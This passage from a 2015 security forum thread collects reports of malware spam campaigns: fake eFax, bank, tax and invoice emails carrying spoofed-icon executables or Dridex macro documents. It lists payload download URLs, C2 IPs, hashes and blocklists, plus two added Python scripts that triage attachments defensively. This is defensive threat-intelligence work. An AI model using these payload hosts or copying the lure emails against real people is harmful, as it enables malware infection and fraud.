8 Apr 2015 - "'eFax message from “Anna” – 2 page(s), Caller-ID: 1- 920-530-9136' pretending to come from eFax <no-replay@ efax .com> with a zip attachment is another one from the current bot runs... The email looks like:
Logo_eFax
JOIN THE eFax COMMUNITY
Facebook twitter google+ youtube
border1
You have a new eFax message. To view your message, see your fax attached or login here.
Fax Details
Caller Id: 920-530-9136
Received: Wed, 08 Apr 2015 18:43:01 +0100
Type: Attached in pdf
Number of pages: 2
Reference #: atl_did9-SK6dCw_1X4W21v_3tk3rGIT
With eFax, did you know you can:
• Send faxes from your desktop or mobile device
• Sign and edit faxes with no printing required
• Send large files by email (up to 1 GB)
Learn more >>
Thank you for using eFax!
Sincerely,
The eFax Team
P.S. Want more solutions to help your business?
Test drive our cloud services from j2 Global with a Free Trial today!
border2
j2 Global | eFax | eVoice | FuseMail | Campaigner | KeepItSafe | OneBox
© 2015 j2 Cloud Services, Inc. All rights reserved.
eFax is a registered trademark of j2 Cloud Services, Inc.
This account is subject to the terms listed in the eFax Customer Agreement.
8 April 2015: SK6dCw 1X4W21v 3tk3rGIT.zip: Extracts to: chase.exe
Current Virus total detections: 5/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9397a7bffd2c8041d2bea152ad531364eb4124e8b40280d3fc36efa1bf97ebd8/analysis/1428511349/
... Behavioural information
TCP connections
216.146.39.70: https://www.virustotal.com/en/ip-address/216.146.39.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
67.222.12.237: https://www.virustotal.com/en/ip-address/67.222.12.237/information/
109.237.134.22: https://www.virustotal.com/en/ip-address/109.237.134.22/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
___
Fake 'Chase Card For your account' SPAM – PDF malware
- http://myonlinesecurity.co.uk/chase-card-for-your-account-ending-fake-pdf-malware/
8 Apr 2015 - "'Chase Card For your account' ending pretending to come from Chase <dont@ alertsp .chase .com> with a zip attachment is another one from the current bot runs... Other subjects in this chase card spam malware run are:
Hi Customer
For your account ending ...
The email looks like:
If you are having trouble viewing this message, please click here. E-mail Security Information.
CHASE
GET ITEMIZED & ORGANIZED
1. Log on to www .chase .com/creditcards.
At the bottom of you statement page, click "year end summary" link.
View,print, or save your summary.
ACTIVATE ALERTS
GO PAPERLESS
Dear Customer,
For your credit card ending in: 0093Your 2015 Year End Summary is now attached and ready for you to view. If you have additional accounts that qualify for a year end summary, you will be notified shortly when they are available.
This year’s summary includes eight categories to provide detail about how you use your card. We hope you find this summary helpful as you prepare your taxes and set your budget for 2016.
See all your transactions by category:
Categories
Sincerely,
sig
Deb Walden
Executive Vice President
Customer Experience
Chase Card Services
spacer
GET YOUR FREE SUMMARY - GO NOW
8 April 2015: Chase_Chase Card_information.zip: Extracts to: Chase_Chase Card_information.exe
Current Virus total detections: 4/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...."
* https://www.virustotal.com/en/file/adc576bf26d1ed401276b12c9d2ce043dd286308f433bffba511b91ef0ebacea/analysis/1428505049/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
67.222.12.237: https://www.virustotal.com/en/ip-address/67.222.12.237/information/
109.237.134.22: https://www.virustotal.com/en/ip-address/109.237.134.22/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/
:fear::fear: :mad:
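Nearly every report in the post above turns on the same trick: a runnable file whose real extension sits behind a decoy one (msg0005.wav.exe, refund_shipping_DOC.xml.exe, BACS_Transfer_AQ004719.scr) so that, with "hide extensions for known file types" left on, the user sees a voicemail or a PDF. As an added example, not code from the blogs quoted here, the Python below classifies the file names inside a zip attachment so a mail gateway or triage script can flag them before anyone double-clicks; the extension sets are my own assumptions, the sample names come from the reports, and the zip is constructed in memory with placeholder bytes.

```python
"""Flag deceptive attachment names of the kind seen in the spam runs above.

Added example, not code from the quoted blogs. The extension sets are
assumptions; the sample file names are taken from the reports and the
zip is built in memory from placeholder bytes (no real malware involved).
"""
import io
import zipfile
from typing import Dict, List

# Final extensions Windows treats as directly runnable (assumed set).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd",
                   "js", "jse", "vbs", "vbe", "wsf", "hta"}
# "Document" extensions the reports show being used as a decoy in front
# of the real one (assumed set).
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "xml",
              "jpg", "png", "gif", "txt"}
# Office formats that can carry a VBA macro downloader (assumed set).
MACRO_CAPABLE_EXTS = {"doc", "dot", "xls", "xlt", "docm", "xlsm", "dotm", "rtf"}


def classify_name(name: str) -> str:
    """Classify one file name.

    Returns 'double-extension' for decoy.ext.exe style names,
    'executable' for any other runnable extension, 'macro-capable'
    for Office formats that may carry a macro, and 'ok' otherwise.
    """
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    if len(parts) < 2:
        return "ok"          # no extension at all
    last = parts[-1]
    if last in EXECUTABLE_EXTS:
        # With "hide extensions for known file types" on, Windows shows
        # msg0005.wav.exe as msg0005.wav, so the decoy extension is what
        # the user sees; flag that separately from a plain .exe.
        if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
            return "double-extension"
        return "executable"
    if last in MACRO_CAPABLE_EXTS:
        return "macro-capable"
    return "ok"


def scan_zip(data: bytes) -> Dict[str, str]:
    """Classify every file inside a zip attachment supplied as bytes."""
    results: Dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            results[info.filename] = classify_name(info.filename)
    return results


def worst_verdict(results: Dict[str, str]) -> str:
    """Reduce per-member verdicts to one verdict for the whole attachment."""
    for verdict in ("double-extension", "executable", "macro-capable", "ok"):
        if verdict in results.values():
            return verdict
    return "ok"              # empty archive


def build_sample_zip(members: List[str]) -> bytes:
    """Construct an in-memory zip holding placeholder bytes under the given names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in members:
            zf.writestr(name, b"placeholder, not an executable")
    return buf.getvalue()


# Attachment names quoted in the reports above (contents are placeholder only).
SAMPLE_NAMES = [
    "msg0005.wav.exe",                      # Voipfone 'voicemail'
    "refund_shipping_DOC.xml.exe",          # 'sorry you had a problem'
    "invoice.92004711.2015.04.08.doc.exe",  # same run
    "BACS_Transfer_AQ004719.scr",           # NatWest 'BACS Transfer'
    "Q100219366_Mail Out Report.exe",       # 'Mail Out Report'
    "Receipts.doc",                         # McMaster-Carr macro doc
    "genuine_statement.pdf",                # constructed benign name
]

if __name__ == "__main__":
    verdicts = scan_zip(build_sample_zip(SAMPLE_NAMES))
    for name, verdict in verdicts.items():
        print(f"{verdict:17} {name}")
    print("attachment verdict:", worst_verdict(verdicts))
```

A .doc or .xls is only 'macro-capable' here; the extension check says nothing about whether a macro is present, so those still need a separate macro inspection.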
AplusWebMaster
2015-04-10, 17:20
FYI...
Fake 'Invoice Payment Confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/webhosting-uk-invoice-payment-confirmation-word-doc-or-excel-xls-spreadsheet-malware/
10 Apr 2015 - "'Invoice Payment Confirmation' pretending to come from WEBHOSTING UK <billing@ webhosting .uk .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Invoice-Payment-Confirmation.png
10 April 2015 : WHUK2009-160824.doc - Current Virus total detections: 4/57*
... which downloads Dridex from [DO NOT CLICK] architectureetenvironnement .ma/762/532 which is saved as %temp%\miron3.6.exe (virus total**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/bb69f9059c8d3d5443584ac6949714314a8e86ee9cf4932d44e91622f5f34211/analysis/1428669374/
** https://www.virustotal.com/en/file/7337c9fc8a90e2f8443a1e4feec967c936e8819c297ecf5789aa96c7f682c161/analysis/1428673121/
... Behavioural information
TCP connections
37.140.199.100: https://www.virustotal.com/en/ip-address/37.140.199.100/information/
90.84.59.66: https://www.virustotal.com/en/ip-address/90.84.59.66/information/
185.35.77.250: https://www.virustotal.com/en/ip-address/185.35.77.250/information/
94.23.173.233: https://www.virustotal.com/en/ip-address/94.23.173.233/information/
94.23.171.198: https://www.virustotal.com/en/ip-address/94.23.171.198/information/
87.236.215.151: https://www.virustotal.com/en/ip-address/87.236.215.151/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Receipt Request' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/mcmaster-carr-your-receipt-request-word-doc-or-excel-xls-spreadsheet-malware/
10 Apr 2015 - "'Your Receipt Request' pretending to come from McMaster-Carr <la.sales@ mcmaster .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hi ,
I attached the receipts you requested.
Annette
10 April 2015 : Receipts.doc - Current Virus total detections: 4/57*
This is exactly the same malware as the other office macro malware spreading today WEBHOSTING UK Invoice Payment Confirmation* – word doc or excel xls spreadsheet malware..."
* http://myonlinesecurity.co.uk/webhosting-uk-invoice-payment-confirmation-word-doc-or-excel-xls-spreadsheet-malware/
:fear::fear: :mad:
AplusWebMaster
2015-04-12, 01:00
FYI...
VBS Malware tied to Attacks on French TV Station TV5Monde
- http://blog.trendmicro.com/trendlabs-security-intelligence/vbs-malware-tied-to-media-attacks/
Apr 11, 2015 - "... we found that VBS_KJWORM.SMA is observed in at least 12 countries in the past week, including South Africa and India... this malware is available in underground forums and can be used by anyone. This particular malware can be used as a backdoor into the affected system. In addition, the C&C server reportedly used in the attack has been tied to another backdoor, BKDR_BLADABINDI.C. Our investigation leads us to believe the actors behind KJWORM and BLADABINDI are the same. Further information from the Smart Protection Network suggests that other VBS malware variants are currently circulating in the wild. Four separate C&C servers (distinct from those used by NJWORM). These different samples, in turn, are connected to previous NJRAT/JENXCUS attacks. NJRAT has been tied to DUNIHI attacks in the Latin American region... The massive cyber attack that hit the French TV5Monde television network this past April 9, according to reports, began at approximately 10:00 P.M. local time (4:00 P.M. Eastern time), when 11 of their channels went off the air... TV5Monde’s website, company email, as well as their social media outlets came under attack. The network’s Facebook page was used to post propaganda messages allegedly from the Islamic State (ISIS). One of the network’s Twitter accounts was also accessed and posted messages against the United States and France, as well as issued threats to families of French soldiers. Copies of French soldiers’ IDs and passports were also published. It should be noted that the technical background of this attack is not yet clear. However, the -RAT- generator is currently available in several hacker forums and can be used by any threat actor... one does not need a lot of technical skill to use it..."
:fear::fear:
AplusWebMaster
2015-04-13, 17:57
FYI...
Fake 'tax return' SPAM – PDF malware
- http://myonlinesecurity.co.uk/your-tax-return-was-incorrectly-filled-out-fake-pdf-malware/
13 Apr 2015 - "'Your tax return was incorrectly filled out' pretending to come from user <chak.noris@ tax .gov> with a zip attachment is another one from the current bot runs... The email looks like:
Attention: Owner/ Manager
We would like to inform you that you have made mistakes while completing
the last tax form application (ID: 0054206036751) .
Please follow the advice of our tax specialists:
http ://clinicaasera .org/FAX.MESSAGE-DATA-STORAGE/incoming-new_message.html
Please amend the mistakes and send the corrected tax return to your tax
agent as soon as possible.
Yours sincerely
13 April 2015: new-message.zip: Extracts to: new-message.exe
Current Virus total detections: 2/57* . This 'Your tax return was incorrectly filled out' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0116a687f1f10b70480274bd131bc98214686db234654fd0d0abb52903d54207/analysis/1428931605/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
5.141.22.43: https://www.virustotal.com/en/ip-address/5.141.22.43/information/
217.160.235.239: https://www.virustotal.com/en/ip-address/217.160.235.239/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
___
Fake 'inTuit Payroll' SPAM - PDF malware
- http://myonlinesecurity.co.uk/payroll-received-by-intuit-fake-pdf-malware/
13 Apr 2015 - "'Payroll Received by Intuit' pretending to come from Intuit Payroll Services <IntuitPayrollServices@ payrollservices .intuit .com> with a zip attachment is another one from the current bot runs... The email looks like:
Dear, info
We received your payroll on April 13, 2015 at 09:06 AM EST.
Attached is a copy of your Remittance. Please click on the attachment in order to view it.
Please note the deadlines and status instructions below:
If your payroll is received BEFORE 5 p.m., your Direct Deposit employees will be paid two (2) banking days from the date received or on your paycheck date, whichever is later.
If your payroll is received AFTER 5 p.m., your employees will be paid three (3) banking days from the date received or on your paycheck date, whichever is later.
YOUR BANK ACCOUNT WILL BE DEBITED THE DAY BEFORE YOUR CHECKDATE.
Funds are typically withdrawn before normal banking hours so please make sure you have sufficient funds available by 12 a.m. on the date funds are to be withdrawn.
Intuit must receive your payroll by 5 p.m., two banking days before your paycheck date or your employees will not be paid on time.
Intuit does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Sincerely,
Intuit Payroll Services ...
13 April 2015: payroll_report_08222014.zip: Extracts to: payroll_report_08222014.exe
Current Virus total detections: 6/57* . This 'Payroll Received by Intuit' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/90c6b8dc66b66de762c42bcf0df9abe3378ba11c10f2d904acb673f40e2891be/analysis/1428945209/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
27.121.64.159: https://www.virustotal.com/en/ip-address/27.121.64.159/information/
5.141.22.43: https://www.virustotal.com/en/ip-address/5.141.22.43/information/
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
___
Another '419' Spam/Scam
- https://blog.malwarebytes.org/fraud-scam/2015/04/international-reconciliation-and-logistics-vault-419-spam/
Apr 13, 2015 - "Every now and then a 419 scammer dredges up an old scam mail, gives it a bit of spit and polish then sends it back out into the wild. The “International Reconciliation and Logistics Vault” has been a subject for 419 attempts* for a number of years now, though the typical format of these missives tends to be more like this one. Indeed, here it comes again:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/logisticsspam.jpg
... Should you receive this one, feel free to send it right to the trash..."
* https://en.wikipedia.org/wiki/419_scams
:fear::fear: :mad:
AplusWebMaster
2015-04-14, 12:24
FYI...
Fake 'Invoice' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-kairen-varker.html
15 Apr 2015 - "This fake invoice has a malicious attachment:
From: Kairen Varker [mailto:kvarker@ notifications .kashflow .com] On Behalf Of Kairen Varker
Sent: Tuesday, April 14, 2015 9:26 AM
Subject: Invoice from
I have made the changes need and the site is now mobile ready . Invoice is attached
In this case the attachment is called Invoice-83230.xls which is currently undetected* by AV vendors. It contains this malicious macro... which downloads a component from the following location (although there are probably more than this):
http ://925balibeads .com/94/053.exe
This is saved as %TEMP%\stepk1.5a.exe and has a VirusTotal detection rate of 3/57**. Automated analysis tools... show the malware phoning home to:
78.24.218.186 (TheFirst-RU, Russia)
176.67.160.187 (UK2, UK)
87.236.215.151 (OneGbits, Lithuania)
154.69.104.137 (Sandton Telkom, South Africa)
107.191.46.222 (Vultr Holdings / Choopa LLC, Canada)
94.23.171.198 (OVH, Czech Republic)
74.119.194.18 (RuWeb Corp, US)
37.140.199.100 (Reg.Ru Hosting, Russia)
89.28.83.228 (StarNet SRL, Moldova)
The Malwr report shows that among other files it drops a malicious Dridex DLL with a detection rate of 2/57***.
Recommended blocklist:
78.24.218.186
184.25.56.188
176.67.160.187
87.236.215.151
154.69.104.137
107.191.46.222
94.23.171.198
74.119.194.18
37.140.199.100
89.28.83.228
MD5s:
e46dcc4a49547b547f357a948337b929
1748fc9c5c0587373bf15a6bda380543
1e010195d2e5f6096095078482624995 "
* https://www.virustotal.com/en/file/a901c12b6733909b6fd69a6865c5746d3ea8ec07ac24450815b5247edfb2aa71/analysis/1428998998/
** https://www.virustotal.com/en/file/68aadcf93a28f2427cf27fb70b457d70ec3fed48b34df06c429cd1f530102f67/analysis/1428998395/
*** https://www.virustotal.com/en/file/8f425a0ec6ff3d28685f8b618b01ef5442ff5310f4deaf8760408c1eea77d9ce/analysis/1428999812/
- http://myonlinesecurity.co.uk/invoice-from-kairen-varker-word-doc-or-excel-xls-spreadsheet-malware/
14 Apr 2015
> https://www.virustotal.com/en/file/bfde68ed32bcbdcf2cc3a452f860bf62bb5c7344e032cc2ed8093f9844d7cae9/analysis/1428997086/
___
Fake 'Account reconcilation' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/account-reconcilation-statement-from-random-company-random-characters-word-doc-or-excel-xls-spreadsheet-malware/
14 Apr 2015 - "'Account reconcilation statement' from [random company] [random characters] – coming from random names and email addresses with a zip file attachment that extracts to a malicious word doc and an image of a sales chart is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Account-reconcilation-statement-from_version1.png
... Where you can see the name of the alleged sender matches the name in the body of the email and the random characters in the subject match the attachment zip name. Once you extract the content of the zip you get a folder on the computer that is simply named as a number 2 or 8 or 9 etc. opening the folder gives you a malicious word doc and an image of a sales chart like one of these, that are intended to help convince you of the genuine nature of the word doc and entice you to open it and get infected:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/confirmation-images.jpg
...
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Visual-graph.jpg
...
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/sales-cmp.jpg
... 4 April 2015 : documentation.doc / vs74_stats.doc / cmp static.doc
Current Virus total detections: 0/56* | 0/56** | 0/56*** . So far I have examined 3 different versions of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9a39c3a3d112b568690a79c484b8a6731c1edf77d1f3a504754098dfbf0d8078/analysis/1429005163/
** https://www.virustotal.com/en/file/d935dac49e0811e7a7f310c75cfe4f220ea738b9e74295dca73e5aeca9693624/analysis/1429005436/
*** https://www.virustotal.com/en/file/d935dac49e0811e7a7f310c75cfe4f220ea738b9e74295dca73e5aeca9693624/analysis/1429005436/
___
Fake 'HM Revenue' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/cis-online-submission-received-by-hm-revenue-and-customs-fake-pdf-malware/
14 Apr 2015 - "'CIS Online submission received by HM Revenue and Customs' pretending to come from helpdesk@ ir-efile .gov .uk with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/CIS-Online-submission-received-by-HM-Revenue-and-Customs.png
14 April 2015: Returns_Report.zip: Extracts to: Returns_Report.exe
Current Virus total detections: 5/57* . This 'CIS Online submission received by HM Revenue and Customs' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...."
* https://www.virustotal.com/en/file/84473a0a5dd1db8adee8bb6520e1da44576cb22090ed74d97edc019c984c3acb/analysis/1429017381/
___
Fake 'Credit Release' SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-credit-release-request-hsbc-com-fake-pdf-malware/
14 Apr 2015 - "'RE: Credit Release Request' pretending to come from Bank <tim.redmon@ hsbc .com> ( random names @ hsbc .com) with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/RE-Credit-Release-Request.png
14 April 2015: banP_.zip: Extracts to: banк.exe
Current Virus total detections: 6/57* . This RE: Credit Release Request is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/197351ef19d0d582bf23e415e6837c38a0294bc58080cb8a3b55eb14d447456d/analysis/1429017978/
... Behavioural information
TCP connections
83.219.139.124: https://www.virustotal.com/en/ip-address/83.219.139.124/information/
90.84.60.97: https://www.virustotal.com/en/ip-address/90.84.60.97/information/
5.141.22.43: https://www.virustotal.com/en/ip-address/5.141.22.43/information/
___
Fake 'Auto Invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/invoice-bi653133-dorset-auto-spares-blandford-autonetplus-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
14 Apr 2015 - "'INVOICE BI653133' pretending to come from websales(random number)@autonetplus .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Account: 1164
From: DORSET AUTO SPARES BLANDFORD
The following are attached to this email:
IBI653133.XLS
14 April 2015 : IBI653133.XLS
Current Virus total detections: 0/56* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e7fff733950f13a4509ef917d259a27d999a5d648dff66498924d0d58985cb6f/analysis/1429017301/
___
CoinVault ransomware: Retrieve data without paying the criminals
- http://net-security.org/malware_news.php?id=3017
14.04.2015 - "Victims of the CoinVault ransomware have a chance to retrieve their data -without- having to pay the criminals, thanks to a repository of decryption keys and a -decryption- application made available online by Kaspersky Lab and the National High Tech Crime Unit (NHTCU) of the Netherlands’ police:
> https://noransom.kaspersky.com/
CoinVault ransomware has been around for a while, encrypting victims’ files and demanding Bitcoins to unlock them. In order to help victims recover from an attack, the NHTCU and the Netherlands’ National Prosecutors Office obtained a database from a CoinVault command & control sever. This server contained Initialization Vectors (IVs), Keys and private Bitcoin wallets and helped to create the special repository of decryption keys. As the investigation is ongoing, new keys will be added when available. “We have uploaded a huge number of keys onto the site. If we do not currently have records for a particular Bitcoin wallet, you can check again in the near future, because together with the National High Tech Crime Unit of the Netherlands’ police we are continuously updating the information,” - says Jornt van der Wiel, Security Researcher at Kaspersky Lab. CoinVault has infected more than 1,000 Windows-based machines in over 20 countries, with the majority of victims in the Netherlands, Germany, the USA, France and the UK. Victims have also been registered in Belgium, Austria, Switzerland, Norway, Sweden, Luxemburg, Denmark, Slovakia, Slovenia, Spain, Italy, Hungary, Ireland, Croatia, Russia, Canada, Israel, the United Arab Emirates, China, Indonesia, Thailand, South Africa, Australia, New Zealand, Panama, the Dominican Republic, and Mexico."
___
Fake 'USPS' SPAM - PDF malware
- http://myonlinesecurity.co.uk/usps-fail-to-deliver-your-package-fake-pdf-malware/
14 Apr 2015 - "'USPS – Fail to deliver your package' pretending to come from USPS <no-reply@ usps .gov> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/USPS-Fail-to-deliver-your-package.png
14 April 2015: USPS2335999.zip: Extracts to: USPS04142015.scr
Current Virus total detections: 7/55* . This 'USPS – Fail to deliver your package' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8fa64cf8f24bb2e7a33de44cac8820186231c159e3a6e49d7aa968b25cf8ca67/analysis/1429034017/
... Behavioural information
TCP connections
83.219.139.124: https://www.virustotal.com/en/ip-address/83.219.139.124/information/
90.84.60.64: https://www.virustotal.com/en/ip-address/90.84.60.64/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
:fear: :mad:
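Several of the reports above describe the same two lures: a zip that extracts to an .exe or .scr carrying a PDF icon (only visible as an executable when "show known file extensions" is enabled), and Word/Excel attachments that carry a VBA macro which downloads the Dridex loader. The script below is an added example of how a mail gateway or helpdesk could triage such attachments without relying on the icon; it is not code from any of the quoted reports. It judges each file by its extension, by its magic bytes (MZ for a PE executable, the OLE2 and ZIP headers for the two Office container formats) and by a heuristic search for a VBA project. All sample attachments are constructed in memory and are not the real files; the VBA detection is a heuristic (the UTF-16LE stream name "_VBA_PROJECT" in legacy OLE files, a vbaProject.bin member in OOXML files), not a full parser.

```python
"""Attachment triage for the two lures described in the reports above:
executables carrying a PDF icon and Office documents carrying a VBA macro.

Added example, not code from the reports; every sample attachment below is
constructed in memory and is not one of the files from the reports.
"""
import io
import zipfile

# Extensions Windows runs on double-click; a PDF icon embedded in any of
# these makes the file look like a document when extensions are hidden.
EXECUTABLE_EXTENSIONS = {"exe", "scr", "pif", "com", "bat", "cmd",
                         "js", "jse", "vbs", "vbe", "wsf", "hta"}
# Document extensions attackers put in front of the real one (x.pdf.exe).
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
OFFICE_EXTENSIONS = {"doc", "dot", "xls", "xlt", "docm", "xlsm", "docx", "xlsx", "pptm"}

MZ_MAGIC = b"MZ"                                 # DOS/PE header
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls container
ZIP_MAGIC = b"PK\x03\x04"                        # .zip and OOXML (.docx/.docm/.xlsm)
# OLE directory entries store stream names as UTF-16LE; a VBA project lives
# in a "_VBA_PROJECT" stream, so the encoded name is a usable (heuristic) marker.
VBA_STREAM_MARKER = "_VBA_PROJECT".encode("utf-16-le")


def extension(name):
    base = name.rsplit("/", 1)[-1].lower()
    return base.rsplit(".", 1)[-1] if "." in base else ""


def has_vba(data):
    """Heuristic check for a VBA project in either Office container format."""
    if data.startswith(OLE_MAGIC):
        return VBA_STREAM_MARKER in data
    if data.startswith(ZIP_MAGIC):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    return False


def triage_file(name, data):
    """Findings for one file, judged by its name and its content; [] if clean."""
    findings = []
    ext = extension(name)
    parts = name.rsplit("/", 1)[-1].lower().split(".")
    if ext in EXECUTABLE_EXTENSIONS:
        findings.append(f"executable extension .{ext}")
        if len(parts) > 2 and parts[-2] in DOCUMENT_EXTENSIONS:
            findings.append("double extension hides the real type")
    if data.startswith(MZ_MAGIC) and ext not in {"exe", "scr", "dll", "com", "pif"}:
        findings.append("PE executable content under a non-executable name")
    if ext in OFFICE_EXTENSIONS and has_vba(data):
        findings.append("Office document carries a VBA project (macro)")
    return findings


def triage_attachment(name, data, _depth=0):
    """Triage an attachment; zip archives are opened and each member judged.

    Returns {path: [findings]} for every file with at least one finding."""
    results = {}
    if extension(name) == "zip" and data.startswith(ZIP_MAGIC) and _depth < 2:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if not info.is_dir():
                    member = f"{name}/{info.filename}"
                    results.update(triage_attachment(member, zf.read(info), _depth + 1))
        return results
    findings = triage_file(name, data)
    if findings:
        results[name] = findings
    return results


# ---- constructed samples (not the real attachments) -------------------------
def _zip_of(members):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member_name, content in members.items():
            zf.writestr(member_name, content)
    return buf.getvalue()


PE_STUB = b"MZ" + b"\x00" * 62  # only the DOS magic matters for this check
SAMPLE_ATTACHMENTS = {
    # zip that extracts to an .exe, the pattern of the "fake PDF" reports
    "new-message.zip": _zip_of({"new-message.exe": PE_STUB}),
    # legacy Word document with a VBA project stream
    "Receipts.doc": OLE_MAGIC + b"\x00" * 504 + VBA_STREAM_MARKER + b"\x00" * 8,
    # OOXML macro-enabled document
    "Invoice.docm": _zip_of({"[Content_Types].xml": "<Types/>",
                             "word/document.xml": "<w:document/>",
                             "word/vbaProject.bin": b"\x00" * 16}),
    # benign PDF
    "statement.pdf": b"%PDF-1.4\n%%EOF\n",
}


def triage_samples():
    """Run the triage over every constructed sample."""
    return {name: triage_attachment(name, data) for name, data in SAMPLE_ATTACHMENTS.items()}


if __name__ == "__main__":
    for name, result in triage_samples().items():
        print(name, "->", result or "clean")
```

The magic-byte check matters more than the extension check: a file whose name says .pdf but whose first two bytes are "MZ" is the same spoofed-icon executable whether or not the user has extensions visible. The macro check only says a VBA project is present, which is the point at which a gateway should quarantine for manual review; it does not say what the macro does.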
AplusWebMaster
2015-04-15, 16:07
FYI...
Fake 'Invoice' SPAM - doc/xls malware
- http://blog.dynamoo.com/2015/04/malware-spam-invoice-from-living-water.html
15 Apr 2015 - "This -fake- invoice does not come from Living Water, but instead is a simple forgery with a malicious attachment.
From: Natalie [mailto:accounts@living-water.co.uk]
Sent: Wednesday, April 15, 2015 9:43 AM
Subject: Invoice from Living Water
Dear Customer :
Your invoice is attached. Please remit payment at your earliest convenience.
Thank you for your business - we appreciate it very much.
Sincerely,
Living Water
0203 139 9051
In the sample that I received, the attachment was named Inv_300846161_from_Living_W.doc which has a VirusTotal detection rate of 1/55*. This contains a malicious macro... which downloads a file from the following location:
http ://adlitipcenaze .com/353/654.exe
There are probably other download locations, but they will all have the same payload. This is saved as %TEMP%\rizob1.0.exe and currently has a detection rate of 6/57**. Automated analysis tools... show attempted connections to the following IPs:
89.28.83.228 (StarNet, Moldova)
78.24.218.186 (TheFirst-RU, Russia)
37.140.199.100 (Reg.Ru Hosting, Russia)
According to this Malwr report it drops a Dridex DLL with a detection rate of 4/57***.
Recommended blocklist:
89.28.83.228
78.24.218.186
37.140.199.100
MD5s:
2ecf5e35d681521997e293513144fd80
9932c4a05ca0233f27b0f8404a8dc5bd
68e1e7251314944a4b4815adced70328
* https://www.virustotal.com/en/file/54592c20b4937b3136435026434be14f9c951195c19cc346155646961cf9e3b8/analysis/1429086775/
** https://www.virustotal.com/en/file/3202fe0fb2a5cfee79b87349cfa75d8992a7e9c0442dff740b3e999fe360b006/analysis/1429086792/
